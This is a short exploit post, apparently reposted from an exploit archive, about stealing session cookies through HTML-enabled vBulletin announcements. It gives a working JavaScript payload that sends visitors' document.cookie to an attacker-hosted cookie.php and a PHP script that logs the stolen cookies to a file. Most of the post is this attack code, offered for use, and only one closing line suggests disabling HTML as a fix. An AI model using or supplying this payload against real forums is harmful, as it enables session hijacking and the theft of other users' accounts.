vBulletin Announcements, by
default
has html enabled, so
if
you get access to a forum using other exploits
and
get a user with acp info, but it only has
default
admin cp permissions (moderator access
and
announcements), you can inject a cookie stealer
and
steal other users informations.
admincp>announcements>create a
new
one>put some random announcemnt + this code:
<script language="JavaScript">
document.location= " http://www.yoursite.com/cookie.php?p=" + document.cookie; </script>
and
in your site put this
and
name it cookie.php
<?php
$cookie = $HTTP_GET_VARS[" p"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";
?>
If you're the owner, a
"fix"
for
this is disallow html in announcements.
# 1337day.com [2012-12-16]
vBulletin Announcements Cookie Steal Vulnerability
Views:
0 comments:
Post a Comment